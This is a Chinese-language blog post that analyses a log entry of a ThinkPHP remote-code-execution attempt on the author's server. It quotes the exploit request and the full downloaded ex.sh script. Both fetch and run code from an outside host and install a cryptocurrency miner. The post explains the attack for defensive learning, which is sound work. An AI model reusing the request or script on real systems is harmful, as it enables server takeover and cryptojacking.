2018年12月30日 星期日

從 Web Log 學習系統漏洞 29

又是中國的架站套件

從我的 web log 擷取的資料:
205.185.113.123 - - [29/Dec/2018:21:37:59 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 302 388 "-" "Sefa"

利用 thinkphp 這個架站套件漏洞, 企圖下載一個 ex.sh 的程式碼再執行

下載回來ex.sh的內容:
cd /tmp; wget http://205.185.113.123/mcoin; curl http://205.185.113.123/mcoin -O; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/mcoin-ankit; curl http://205.185.113.123/mcoin-ankit -O; chmod 777 mcoin-ankit; ./mcoin-ankit -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWs
mv /var/www/html/index.php /var/www/html/elrekt.php
rm -rf /tmp/ex.sh
將一個 mcoin 編碼過的程式下載至暫存目錄, 修改權限到最大再執行, 還會硬操CPU... 估狗了一下這個 mcoin, 一種類似比特幣的虛擬貨幣, 所以可以推論這是一個偷偷植入木馬並且綁架你的電腦當作挖礦機的東西

沒有留言:

張貼留言